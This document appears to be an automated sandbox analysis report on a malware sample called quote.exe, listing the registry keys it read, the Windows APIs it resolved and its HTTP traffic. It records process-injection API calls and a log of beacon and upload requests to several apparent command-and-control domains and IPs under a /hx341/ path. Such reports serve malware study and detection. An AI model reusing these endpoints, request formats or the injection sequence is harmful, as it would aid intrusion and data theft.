HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1244d1b3\7eb675fa
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|quote.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|quote.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|quote.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1244d1b3\254b1c7e
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName

Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

Global\CLR_CASOFF_MUTEX

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.IsProcessorFeaturePresent
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
kernel32.dll.QueryActCtxW
kernel32.dll.GetVersionExW
kernel32.dll.GetFullPathNameW
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
mscorjit.dll.getJit
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
bcrypt.dll.BCryptGetFipsAlgorithmMode
kernel32.dll.VirtualProtect
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.SwitchToThread
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcessId
advapi32.dll.LookupPrivilegeValueW
kernel32.dll.GetCurrentProcess
advapi32.dll.AdjustTokenPrivileges
kernel32.dll.OpenProcess
psapi.dll.EnumProcessModules
psapi.dll.GetModuleInformation
psapi.dll.GetModuleBaseNameW
psapi.dll.GetModuleFileNameExW
kernel32.dll.GetProcAddress
kernel32.dll.DebugActiveProcess
kernel32.dll.WaitForDebugEvent
kernel32.dll.ContinueDebugEvent
kernel32.dll.DeleteFileA
advapi32.dll.SetKernelObjectSecurity
advapi32.dll.GetKernelObjectSecurity
ntdll.dll.NtSetInformationProcess
ntdll.dll.NtProtectVirtualMemory
kernel32.dll.VirtualAllocEx
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.ResumeThread
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.WriteProcessMemory
kernel32.dll.ReadProcessMemory
kernel32.dll.TerminateProcess
kernel32.dll.CreateProcessW
ole32.dll.CoUninitialize
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx

Execute Commands

"C:\Users\Seven01\AppData\Local\Temp\quote.exe"

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven06_64 Seven06_64 VirtualBox 2018-06-06 19:54:58 2018-06-06 19:57:50 172

16 HTTP Request(s) detected

http://www.compassionculinary.com/hx341/?BZR8IL=3oc5PmwIVu81gaHR66Rk5vzhUqw8gqyUmPOVsOu2vlNx9t3g/cQlUk/MXbZa987434sTF+/o&VRKh=vBZhY2t8uPPhc4
  • Hostname: www.compassionculinary.com
  • IP Address:
  • Port: 80
  • Count: 1

GET /hx341/?BZR8IL=3oc5PmwIVu81gaHR66Rk5vzhUqw8gqyUmPOVsOu2vlNx9t3g/cQlUk/MXbZa987434sTF+/o&VRKh=vBZhY2t8uPPhc4 HTTP/1.1
Host: www.compassionculinary.com
Connection: close


http://www.mingyaparts.com/hx341/?BZR8IL=jRIocrurTLrRTYjKrvLnsRHIIE09EgelhsxMz9/UjDWwlWQgCAmb0IzcxS/9Ly/HoGQ7omNK&VRKh=vBZhY2t8uPPhc4
  • Hostname: www.mingyaparts.com
  • IP Address: 202.61.85.95
  • Port: 80
  • Count: 1

GET /hx341/?BZR8IL=jRIocrurTLrRTYjKrvLnsRHIIE09EgelhsxMz9/UjDWwlWQgCAmb0IzcxS/9Ly/HoGQ7omNK&VRKh=vBZhY2t8uPPhc4 HTTP/1.1
Host: www.mingyaparts.com
Connection: close


http://www.mingyaparts.com/hx341/
  • Hostname: www.mingyaparts.com
  • IP Address: 202.61.85.95
  • Port: 80
  • Count: 1

POST /hx341/ HTTP/1.1
Host: www.mingyaparts.com
Connection: close
Content-Length: 2200
Cache-Control: no-cache
Origin: http://www.mingyaparts.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.mingyaparts.com/hx341/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.mingyaparts.com/hx341/
  • Hostname: www.mingyaparts.com
  • IP Address: 202.61.85.95
  • Port: 80
  • Count: 1

POST /hx341/ HTTP/1.1
Host: www.mingyaparts.com
Connection: close
Content-Length: 57208
Cache-Control: no-cache
Origin: http://www.mingyaparts.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.mingyaparts.com/hx341/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.mrjbear.com/hx341/?BZR8IL=Phz/uspywdyKcLDiL/z6MAt4FxnSrsE5uzMWhrPeAMHCKoHWPMMbGczhUQlsE9URfUc2Od2t&VRKh=vBZhY2t8uPPhc4
  • Hostname: www.mrjbear.com
  • IP Address: 74.208.236.193
  • Port: 80
  • Count: 1

GET /hx341/?BZR8IL=Phz/uspywdyKcLDiL/z6MAt4FxnSrsE5uzMWhrPeAMHCKoHWPMMbGczhUQlsE9URfUc2Od2t&VRKh=vBZhY2t8uPPhc4 HTTP/1.1
Host: www.mrjbear.com
Connection: close


http://www.mrjbear.com/hx341/
  • Hostname: www.mrjbear.com
  • IP Address: 74.208.236.193
  • Port: 80
  • Count: 1

POST /hx341/ HTTP/1.1
Host: www.mrjbear.com
Connection: close
Content-Length: 2200
Cache-Control: no-cache
Origin: http://www.mrjbear.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.mrjbear.com/hx341/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.mrjbear.com/hx341/
  • Hostname: www.mrjbear.com
  • IP Address: 74.208.236.193
  • Port: 80
  • Count: 1

POST /hx341/ HTTP/1.1
Host: www.mrjbear.com
Connection: close
Content-Length: 57208
Cache-Control: no-cache
Origin: http://www.mrjbear.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.mrjbear.com/hx341/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.georgebillions.com/hx341/?BZR8IL=dVQ3hCpjiqKAxTqVHWuPFzoYxZyEgiJbWtre1nH4IhHWtifN4VOm1W7a9dxD//pgslY8ltgc&VRKh=vBZhY2t8uPPhc4
  • Hostname: www.georgebillions.com
  • IP Address: 162.144.12.28
  • Port: 80
  • Count: 1

GET /hx341/?BZR8IL=dVQ3hCpjiqKAxTqVHWuPFzoYxZyEgiJbWtre1nH4IhHWtifN4VOm1W7a9dxD//pgslY8ltgc&VRKh=vBZhY2t8uPPhc4 HTTP/1.1
Host: www.georgebillions.com
Connection: close


http://www.georgebillions.com/hx341/
  • Hostname: www.georgebillions.com
  • IP Address: 162.144.12.28
  • Port: 80
  • Count: 1

POST /hx341/ HTTP/1.1
Host: www.georgebillions.com
Connection: close
Content-Length: 2200
Cache-Control: no-cache
Origin: http://www.georgebillions.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.georgebillions.com/hx341/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.georgebillions.com/hx341/
  • Hostname: www.georgebillions.com
  • IP Address: 162.144.12.28
  • Port: 80
  • Count: 1

POST /hx341/ HTTP/1.1
Host: www.georgebillions.com
Connection: close
Content-Length: 57208
Cache-Control: no-cache
Origin: http://www.georgebillions.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.georgebillions.com/hx341/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.dummdum.com/hx341/?BZR8IL=VfoEWrNHh2nOP0kuS3jskkX1jzwFGtTp145q8Ia3x1foM7fmX5iRWtJv0P8J0NEqWl1w4UCC&VRKh=vBZhY2t8uPPhc4
  • Hostname: www.dummdum.com
  • IP Address: 198.54.117.218
  • Port: 80
  • Count: 1

GET /hx341/?BZR8IL=VfoEWrNHh2nOP0kuS3jskkX1jzwFGtTp145q8Ia3x1foM7fmX5iRWtJv0P8J0NEqWl1w4UCC&VRKh=vBZhY2t8uPPhc4 HTTP/1.1
Host: www.dummdum.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.dummdum.com/hx341/
  • Hostname: www.dummdum.com
  • IP Address: 198.54.117.218
  • Port: 80
  • Count: 1

POST /hx341/ HTTP/1.1
Host: www.dummdum.com
Connection: close
Content-Length: 2200
Cache-Control: no-cache
Origin: http://www.dummdum.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.dummdum.com/hx341/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.dummdum.com/hx341/
  • Hostname: www.dummdum.com
  • IP Address: 198.54.117.218
  • Port: 80
  • Count: 1

POST /hx341/ HTTP/1.1
Host: www.dummdum.com
Connection: close
Content-Length: 57208
Cache-Control: no-cache
Origin: http://www.dummdum.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.dummdum.com/hx341/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.self90.com/hx341/?BZR8IL=3NNdf/G5nckVFT7smik8PvBazO72+VnkCvfvxor92AU3NUzmpy7cBOD6ixld4E9yVmNQqcKt&VRKh=vBZhY2t8uPPhc4
  • Hostname: www.self90.com
  • IP Address: 204.11.56.48
  • Port: 80
  • Count: 1

GET /hx341/?BZR8IL=3NNdf/G5nckVFT7smik8PvBazO72+VnkCvfvxor92AU3NUzmpy7cBOD6ixld4E9yVmNQqcKt&VRKh=vBZhY2t8uPPhc4 HTTP/1.1
Host: www.self90.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.self90.com/hx341/
  • Hostname: www.self90.com
  • IP Address: 204.11.56.48
  • Port: 80
  • Count: 1

POST /hx341/ HTTP/1.1
Host: www.self90.com
Connection: close
Content-Length: 2200
Cache-Control: no-cache
Origin: http://www.self90.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
